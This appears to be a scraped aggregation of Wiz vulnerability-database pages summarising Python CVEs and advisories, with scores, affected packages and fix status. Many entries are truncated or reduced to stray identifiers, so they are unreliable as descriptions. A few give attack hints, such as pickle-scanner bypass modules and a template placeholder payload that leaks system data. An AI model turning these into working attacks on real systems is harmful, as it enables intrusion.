CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wger
Sources
NVD
pip Severity MEDIUM No Fix Added at: Mar 02, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
Wiz
Die CVE-Datenbank: Kuratierte Vulnerability Intelligence von Wiz | Wiz
blogs_wiz·CVSS 9.8
[CRITICAL] Die CVE-Datenbank: Kuratierte Vulnerability Intelligence von Wiz | Wiz
## Datenbank für Wiz-Schwachstellen
Eine umfassende Ressource für die Überwachung hochkarätiger Schwachstellen in Cloud-Umgebungen, die auf Sicherheitsteams und Cloud-Experten zugeschnitten ist
Sehen Sie, wie Wiz ausnutzbare Schwachstellen in Cloud-Workloads erkennt. Schau dir die 12-minütige Demo an
## Nach Technologie erkunden
## Beliebte Filter
## Hohes Profil
CVE-Kennung
Strenge
Punktzahl
Technologieen
Name der Komponente
CISA KEV-Exploit
Hat fix
Veröffentlichungsdatum
CVE-2026-35616
CRITICAL
9.8
FortiClient EMS
cpe:2.3:a:fortinet:forticlient_enterprise_management_server
Ja
Ja
Apr 04, 2026
GHSA-69fq-xp46-6x23
CRITICAL
9.4
N/A
github.com/aquasecurity/trivy
Nein
Ja
Mar 24, 2026
CVE-2026-3055
CRITICAL
9.3
Citrix ADC VPX
cpe:2.3:a:citrix:netscaler_app
Wiz
CVE-2026-34046 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-34046 [HIGH] CVE-2026-34046 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34046 :
Python vulnerability analysis and mitigation
_read_flow
src/backend/base/langflow/api/v1/flows.py
AUTO_LOGIN
user_id
AUTO_LOGIN
False
user_id = NULL
AUTO_LOGIN
Source : NVD
## 8.7
Score
Published March 27, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Python
LangFlow
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 24.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
langflow
langflow-base
Sources
NVD
pip Severity HIGH Has Fix Added at: Mar 29, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities
Wiz
CVE-2026-30928 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-30928 [HIGH] CVE-2026-30928 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30928 :
Python vulnerability analysis and mitigation
Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.1, the /api/4/config REST API endpoint returns the entire parsed Glances configuration file (glances.conf) via self.config.as_dict() with no filtering of sensitive values. The configuration file contains credentials for all configured backend services including database passwords, API tokens, JWT signing keys, and SSL key passwords. This vulnerability is fixed in 4.5.1.
Source : NVD
## 8.7
Score
Published March 10, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 87.3
Exploita
Wiz
GHSA-g38g-8gr9-h9xp Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-g38g-8gr9-h9xp Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-g38g-8gr9-h9xp :
Python vulnerability analysis and mitigation
## Summary
picklescan v1.0.3 (latest) does not block at least 7 Python standard library modules that provide direct arbitrary command execution or code evaluation. A malicious pickle file importing these modules is reported as having 0 issues (CLEAN scan). This enables remote code execution that bypasses picklescan entirely.
## Severity
Critical (CVSS 9.8) — Direct RCE with zero scanner detection. Affects all deployments relying on picklescan, including HuggingFace Hub.
## Affected Versions
picklescan <= 1.0.3 (all versions including latest)
## Details
## Unblocked RCE Modules
uuid
_get_command_stdout(cmd, *args)
subprocess.Popen((cmd,) + args)
CLEAN
_osx_support
_read_output(cmdstring)
os.system(
Wiz
CVE-2026-34203 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.7
CVE-2026-34203 [LOW] CVE-2026-34203 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34203 :
Python vulnerability analysis and mitigation
Nautobot is a Network Source of Truth and Network Automation Platform. Prior to versions 2.4.30 and 3.0.10, user creation and editing via the REST API fails to apply the password validation rules defined by Django's AUTH_PASSWORD_VALIDATORS setting (which defaults to an empty list, i.e., no specific rules, but can be configured in Nautobot's nautobot_config.py to apply various rules if desired). This can potentially allow for the creation or modification of users to have passwords that are weak or otherwise do not comply with configured standards. This issue has been patched in versions 2.4.30 and 3.0.10.
Source : NVD
## 2.7
Score
Published March 31, 2026
Severity LOW
CNA Score 2.7
Affected Technologies
Python
Ha
Wiz
CVE-2026-28802 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.7
CVE-2026-28802 [HIGH] CVE-2026-28802 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28802 :
Python vulnerability analysis and mitigation
Authlib is a Python library which builds OAuth and OpenID Connect servers. From version 1.6.5 to before version 1.6.7, previous tests involving passing a malicious JWT containing alg: none and an empty signature was passing the signature verification step without any changes to the application code when a failure was expected.. This issue has been patched in version 1.6.7.
Source : NVD
## 7.7
Score
Published March 6, 2026
Severity HIGH
CNA Score 7.7
Affected Technologies
Python
Wolfi
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
python-authlib
Wiz
CVE-2025-67492 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-67492 [MEDIUM] CVE-2025-67492 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67492 :
Python vulnerability analysis and mitigation
Weblate is a web based localization tool. In versions prior to 5.15, it was possible to trigger repository updates for many repositories via a crafted webhook payload. Version 5.15 fixes the issue. As a workaround, disabling webhooks completely using ENABLE_HOOKS avoids this vulnerability.
Source : NVD
## 5.3
Score
Published December 16, 2025
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
weblate
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Dec 16, 2025
## Get a CVE risk assessme
Wiz
CVE-2026-21883 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.5
CVE-2026-21883 [MEDIUM] CVE-2026-21883 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21883 :
Python vulnerability analysis and mitigation
Bokeh is an interactive visualization library written in Python. In versions 3.8.1 and below, if a server is configured with an allowlist (e.g., dashboard.corp), an attacker can register a domain like dashboard.corp.attacker.com (or use a subdomain if applicable) and lure a victim to visit it. The malicious site can then initiate a WebSocket connection to the vulnerable Bokeh server. Since the Origin header (e.g., http://dashboard.corp.attacker.com/ ) matches the allowlist according to the flawed logic, the connection is accepted. Once connected, the attacker can interact with the Bokeh server on behalf of the victim, potentially accessing sensitive data, or modifying visualizations. This issue is fixed in version 3.8.2.
S
Wiz
CVE-2026-32596 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-32596 [HIGH] CVE-2026-32596 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32596 :
Python vulnerability analysis and mitigation
glances -w
Source : NVD
## 8.7
Score
Published March 18, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 88.7
Exploitation Probability (EPSS) 4.2
Affected packages and libraries
glances
Sources
NVD
Alpine 3.10, 3.11, 3.12, 3.13, 3.14, 3.15, 3.16, 3.17, 3.18, 3.19, 3.20, 3.21, 3.22, 3.23, edge Severity HIGH No Fix Added at: Mar 19, 2026
Debian 12, 13 Severity MEDIUM No Fix Added at: Mar 19, 2026
Debian 14 Severity HIGH Has Fix Added at: Mar 19, 2026
Echo Severity HIGH No Fix Added at: Mar 19, 2026
pip Severity HIGH Has Fix Added at: Mar 17, 202
Wiz
CVE-2026-25480 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-25480 [MEDIUM] CVE-2026-25480 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25480 :
Python vulnerability analysis and mitigation
Litestar is an Asynchronous Server Gateway Interface (ASGI) framework. Prior to 2.20.0, FileStore maps cache keys to filenames using Unicode NFKD normalization and ord() substitution without separators, creating key collisions. When FileStore is used as response-cache backend, an unauthenticated remote attacker can trigger cache key collisions via crafted paths, causing one URL to serve cached responses of another (cache poisoning/mixup). This vulnerability is fixed in 2.20.0.
Source : NVD
## 6.5
Score
Published February 9, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Perc
Wiz
CVE-2026-25479 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-25479 [MEDIUM] CVE-2026-25479 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25479 :
Python vulnerability analysis and mitigation
Litestar is an Asynchronous Server Gateway Interface (ASGI) framework. Prior to 2.20.0, in litestar.middleware.allowed_hosts, allowlist entries are compiled into regex patterns in a way that allows regex metacharacters to retain special meaning (e.g., . matches any character). This enables a bypass where an attacker supplies a host that matches the regex but is not the intended literal hostname. This vulnerability is fixed in 2.20.0.
Source : NVD
## 6.5
Score
Published February 9, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.6
Exploitation Probability
Wiz
CVE-2026-25735 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-25735 [MEDIUM] CVE-2026-25735 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25735 :
Python vulnerability analysis and mitigation
Rucio is a software framework that provides functionality to organize, manage, and access large volumes of scientific data using customizable policies. Versions prior to 35.8.3, 38.5.4, and 39.3.1 have a stored Cross-Site Scripting (XSS) vulnerability in the Identity Name of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions. Versions 35.8.3, 38.5.4, and 39.3.1 fix the issue.
Source : NVD
## 4.8
Score
Published February 25, 2026
Severity MEDIUM
CNA Score 6.1
Affecte
Wiz
CVE-2026-3060 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-3060 [CRITICAL] CVE-2026-3060 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3060 :
Python vulnerability analysis and mitigation
SGLang' encoder parallel disaggregation system is vulnerable to unauthenticated remote code execution through the disaggregation module, which deserializes untrusted data using pickle.loads() without authentication.
Source : NVD
## 9.8
Score
Published March 12, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Python
SGLang
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 70.7
Exploitation Probability (EPSS) 0.6
Affected packages and libraries
cpe:2.3:a:lmsys:sglang
sglang
Sources
pip Severity CRITICAL No Fix Added at: Mar 12, 2026
Linux Severity CRITICAL No Fix Added at: Apr 02, 2026
Windows Severity CRI
Wiz
CVE-2026-34936 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.7
CVE-2026-34936 [HIGH] CVE-2026-34936 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34936 :
Python vulnerability analysis and mitigation
PraisonAI is a multi-agent teams system. Prior to version 4.5.90, passthrough() and apassthrough() in praisonai accept a caller-controlled api_base parameter that is concatenated with endpoint and passed directly to httpx.Client.request() when the litellm primary path raises AttributeError. No URL scheme validation, private IP filtering, or domain allowlist is applied, allowing requests to any host reachable from the server. This issue has been patched in version 4.5.90.
Source : NVD
## 7.7
Score
Published April 3, 2026
Severity HIGH
CNA Score 7.7
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS
Wiz
CVE-2026-22608 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.9
CVE-2026-22608 [HIGH] CVE-2026-22608 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22608 :
Python vulnerability analysis and mitigation
Fickling is a Python pickling decompiler and static analyzer. Prior to version 0.1.7, both ctypes and pydoc modules aren't explicitly blocked. Even other existing pickle scanning tools (like picklescan) do not block pydoc.locate. Chaining these two together can achieve RCE while the scanner still reports the file as LIKELY_SAFE. This issue has been patched in version 0.1.7.
Source : NVD
## 8.9
Score
Published January 10, 2026
Severity HIGH
CNA Score 8.9
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
fickling
Sources
Wiz
CVE-2026-28223 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-28223 [MEDIUM] CVE-2026-28223 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28223 :
Python vulnerability analysis and mitigation
Wagtail is an open source content management system built on Django. Prior to versions 6.3.8, 7.0.6, 7.2.3, and 7.3.1, a stored cross-site scripting (XSS) vulnerability exists on confirmation messages within the wagtail.contrib.simple_translation module. A user with access to the Wagtail admin area may create a page with a specially-crafted title which, when another user performs the "Translate" action, causes arbitrary JavaScript code to run. This could lead to performing actions with that user's credentials. The vulnerability is not exploitable by an ordinary site visitor without access to the Wagtail admin. This issue has been patched in versions 6.3.8, 7.0.6, 7.2.3, and 7.3.1.
Source : NVD
## 6.1
Score
Published M
Wiz
CVE-2026-34446 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.7
CVE-2026-34446 [MEDIUM] CVE-2026-34446 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34446 :
Python vulnerability analysis and mitigation
Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. Prior to version 1.21.0, there is an issue in onnx.load, the code checks for symlinks to prevent path traversal, but completely misses hardlinks because a hardlink looks exactly like a regular file on the filesystem. This issue has been patched in version 1.21.0.
Source : NVD
## 4.7
Score
Published April 1, 2026
Severity MEDIUM
CNA Score 4.7
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
onnx
py3-onnx
Sources
NVD
C
Wiz
CVE-2026-24126 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.6
CVE-2026-24126 [MEDIUM] CVE-2026-24126 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24126 :
Python vulnerability analysis and mitigation
ssh-add
Source : NVD
## 9.1
Score
Published February 19, 2026
Severity CRITICAL
CNA Score 6.6
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
weblate
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Feb 18, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CVE-2026-35615
CRITICAL
9.2
Wiz
CVE-2026-32109 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.7
CVE-2026-32109 [LOW] CVE-2026-32109 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32109 :
Python vulnerability analysis and mitigation
Copyparty is a portable file server. Prior to 1.20.12, if an attacker has been given both read- and write-permissions to the server, they can upload a malicious file with the filename .prologue.html and then craft a link to potentially execute arbitrary JavaScript in the victim's context. Note that it is intended behavior that the JavaScript would execute if the target clicks a link to the HTML file itself; "https://example.com/foo/.prologue.html". The vulnerability is that "https://example.com/foo/?b" would also evaluate the file, making the behavior unexpected. There are existing preventative measures (strict SameSite cookies) which makes it harder to leverage this vulnerability in an attack; in order to gain control of t
Wiz
CVE-2025-69872 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2025-69872 [CRITICAL] CVE-2025-69872 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-69872 :
Python vulnerability analysis and mitigation
DiskCache (python-diskcache) through 5.6.3 uses Python pickle for serialization by default. An attacker with write access to the cache directory can achieve arbitrary code execution when a victim application reads from the cache.
Source : NVD
## 9.8
Score
Published February 11, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Python
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
diskcache
python3-diskcache
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Feb 12, 2026
Debian 14 Severity CRITICAL No Fix Ad
Wiz
CVE-2026-34172 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.7
CVE-2026-34172 [HIGH] CVE-2026-34172 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34172 :
Python vulnerability analysis and mitigation
Giskard is an open-source Python library for testing and evaluating agentic systems. Prior to versions 0.3.4 and 1.0.2b1, ChatWorkflow.chat(message) passes its string argument directly as a Jinja2 template source to a non-sandboxed Environment. A developer who passes user input to this method enables full remote code execution via Jinja2 class traversal. The method name chat and parameter name message naturally invite passing user input directly, but the string is silently parsed as a Jinja2 template, not treated as plain text. This issue has been patched in versions 0.3.4 and 1.0.2b1.
Source : NVD
## 7.7
Score
Published March 31, 2026
Severity HIGH
CNA Score 7.7
Affected Technologies
Python
Has Public Exploit Ye
Wiz
CVE-2026-25130 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.6
CVE-2026-25130 [CRITICAL] CVE-2026-25130 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25130 :
Python vulnerability analysis and mitigation
subprocess.Popen()
shell=True
find_file()
Source : NVD
## 9.6
Score
Published January 30, 2026
Severity CRITICAL
CNA Score 9.6
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cai-framework
Sources
NVD
pip Severity CRITICAL No Fix Added at: Jan 31, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Pu
Wiz
CVE-2026-25516 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-25516 [MEDIUM] CVE-2026-25516 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25516 :
Python vulnerability analysis and mitigation
NiceGUI is a Python-based UI framework. The ui.markdown() component uses the markdown2 library to convert markdown content to HTML, which is then rendered via innerHTML. By default, markdown2 allows raw HTML to pass through unchanged. This means that if an application renders user-controlled content through ui.markdown(), an attacker can inject malicious HTML containing JavaScript event handlers. Unlike other NiceGUI components that render HTML (ui.html(), ui.chat_message(), ui.interactive_image()), the ui.markdown() component does not provide or require a sanitize parameter, leaving applications vulnerable to XSS attacks. This vulnerability is fixed in 3.7.0.
Source : NVD
## 6.1
Score
Published February 6, 2026
Seve
Wiz
GHSA-cwxj-rr6w-m6w7 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-cwxj-rr6w-m6w7 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-cwxj-rr6w-m6w7 :
Python vulnerability analysis and mitigation
## Impact
Referrer-Policy
Referer
scrapy.spidermiddlewares.referer.DefaultReferrerPolicy
Referer
Referrer-Policy
sys.exit
## Patches
Upgrade to Scrapy 2.14.2 (or later).
## Workarounds
If you cannot upgrade to Scrapy 2.14.2, consider the following mitigations.
Referer
REFERER_ENABLED
False
Referer
referrer_policy
referrer_policy
Referrer-Policy
Request(
url,
meta={
"referrer_policy": "scrapy.spidermiddlewares.referer.DefaultReferrerPolicy",
},
)
Instead of editing requests individually, you can:
referrer_policy
Referrer-Policy
None
SPIDER_MIDDLEWARES
Source : NVD
## 7.5
Score
Published March 13, 2026
Severity HIGH
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
H
Wiz
CVE-2025-14881 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.8
CVE-2025-14881 [LOW] CVE-2025-14881 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14881 :
Python vulnerability analysis and mitigation
Multiple API endpoints allowed access to sensitive files from other users by knowing the UUID of the file that were not intended to be accessible by UUID only.
Source : NVD
## 3.8
Score
Published December 19, 2025
Severity LOW
CNA Score 3.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 18
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
pretix
Sources
NVD
pip Severity LOW Has Fix Added at: Dec 22, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulne
Wiz
CVE-2026-22219 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.3
CVE-2026-22219 [HIGH] CVE-2026-22219 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22219 :
Python vulnerability analysis and mitigation
Chainlit versions prior to 2.9.4 contain a server-side request forgery (SSRF) vulnerability in the /project/element update flow when configured with the SQLAlchemy data layer backend. An authenticated client can provide a user-controlled url value in an Element, which is fetched by the SQLAlchemy element creation logic using an outbound HTTP GET request. This allows an attacker to make arbitrary HTTP requests from the Chainlit server to internal network services or cloud metadata endpoints and store the retrieved responses via the configured storage provider.
Source : NVD
## 8.3
Score
Published January 20, 2026
Severity HIGH
CNA Score 8.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit N
Wiz
CVE-2026-2415 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-2415 [HIGH] CVE-2026-2415 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2415 :
Python vulnerability analysis and mitigation
Emails sent by pretix can utilize placeholders that will be filled with customer data. For example, when {name}
is used in an email template, it will be replaced with the buyer's
name for the final email. This mechanism contained two security-relevant
bugs:
It was possible to exfiltrate information about the pretix system through specially crafted placeholder names such as {{event. init . code .co_filename}}.
This way, an attacker with the ability to control email templates
(usually every user of the pretix backend) could retrieve sensitive
information from the system configuration, including even database
passwords or API keys. pretix does include mechanisms to prevent the usage of such
malicious placeholders, however due
Wiz
CVE-2026-32633 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-32633 [CRITICAL] CVE-2026-32633 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32633 :
Python vulnerability analysis and mitigation
/api/4/serverslist
GlancesServersList.get_servers_list()
uri
--password
/api/4/serverslist
Source : NVD
## 9.1
Score
Published March 18, 2026
Severity CRITICAL
CNA Score 9.1
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
glances
Sources
NVD
Debian 12, 13 Severity MEDIUM No Fix Added at: Mar 19, 2026
Debian 14 Severity CRITICAL Has Fix Added at: Mar 19, 2026
Echo Severity CRITICAL No Fix Added at: Mar 19, 2026
pip Severity CRITICAL Has Fix Added at: Mar 17, 2026
Homebrew Severity CRITICAL Has Fix Add
Wiz
CVE-2026-32108 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-32108 [MEDIUM] CVE-2026-32108 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32108 :
Python vulnerability analysis and mitigation
Copyparty is a portable file server. Prior to 1.20.12, there was a missing permission-check in the shares feature (the shr global-option). This vulnerability only applies when the shares feature is used for the specific purpose of creating a share of just a single file inside a folder or either the FTP or SFTP server is enabled, and also made publicly accessible. Given these conditions, when a user is browsing a share through either FTP or SFTP (not http or https), they can gain read-access to the remaining files inside the shared folder by guessing/bruteforcing the filenames. It was not possible to descend into subdirectories in this manner; only the sibling files were accessible. This vulnerability is similar to CVE-2025-
Wiz
CVE-2026-35463 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-35463 [HIGH] CVE-2026-35463 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35463 :
Python vulnerability analysis and mitigation
## Summary
ADMIN_ONLY_OPTIONS
AntiVirus
avfile
subprocess.Popen()
## Details
ADMIN_ONLY_OPTIONS
ADMIN_ONLY_OPTIONS = {
"reconnect.script", # Blocks script path change
"webui.host", # Blocks bind address change
"ssl.cert_file", # Blocks cert path change
"ssl.key_file", # Blocks key path change
# ... other sensitive options
}
Where it IS enforced — core config (core/api/ init .py:255):
def set_config_value(self, section, option, value):
if f"{section}.{option}" in ADMIN_ONLY_OPTIONS:
if not self.user.is_admin:
raise PermissionError("Admin only")
# ...
Where it is NOT enforced — plugin config (core/api/ init .py:271-272):
# Plugin config - NO admin check at all
self.pyload.config.set_plugin(category, option, valu
Wiz
CVE-2026-25739 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-25739 [MEDIUM] CVE-2026-25739 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25739 :
Python vulnerability analysis and mitigation
STATIC_FILE_METHOD
xaccelredirect
Source : NVD
## 5.4
Score
Published February 19, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 21.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
indico
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Feb 18, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CVE-2
Wiz
CVE-2026-22609 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.9
CVE-2026-22609 [HIGH] CVE-2026-22609 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22609 :
Python vulnerability analysis and mitigation
Fickling is a Python pickling decompiler and static analyzer. Prior to version 0.1.7, the unsafe_imports() method in Fickling's static analyzer fails to flag several high-risk Python modules that can be used for arbitrary code execution. Malicious pickles importing these modules will not be detected as unsafe, allowing attackers to bypass Fickling's primary static safety checks. This issue has been patched in version 0.1.7.
Source : NVD
## 8.9
Score
Published January 10, 2026
Severity HIGH
CNA Score 8.9
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.7
Exploitation Probability (EPSS) 0.1
Wiz
CVE-2026-25478 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.4
CVE-2026-25478 [HIGH] CVE-2026-25478 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25478 :
Python vulnerability analysis and mitigation
Litestar is an Asynchronous Server Gateway Interface (ASGI) framework. Prior to 2.20.0, CORSConfig.allowed_origins_regex is constructed using a regex built from configured allowlist values and used with fullmatch() for validation. Because metacharacters are not escaped, a malicious origin can match unexpectedly. The check relies on allowed_origins_regex.fullmatch(origin). This vulnerability is fixed in 2.20.0.
Source : NVD
## 6.5
Score
Published February 9, 2026
Severity MEDIUM
CNA Score 7.4
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.4
Exploitation Probability (EPSS) N/A
Affected pac
Wiz
GHSA-83pf-v6qq-pwmr Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-83pf-v6qq-pwmr Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-83pf-v6qq-pwmr :
Python vulnerability analysis and mitigation
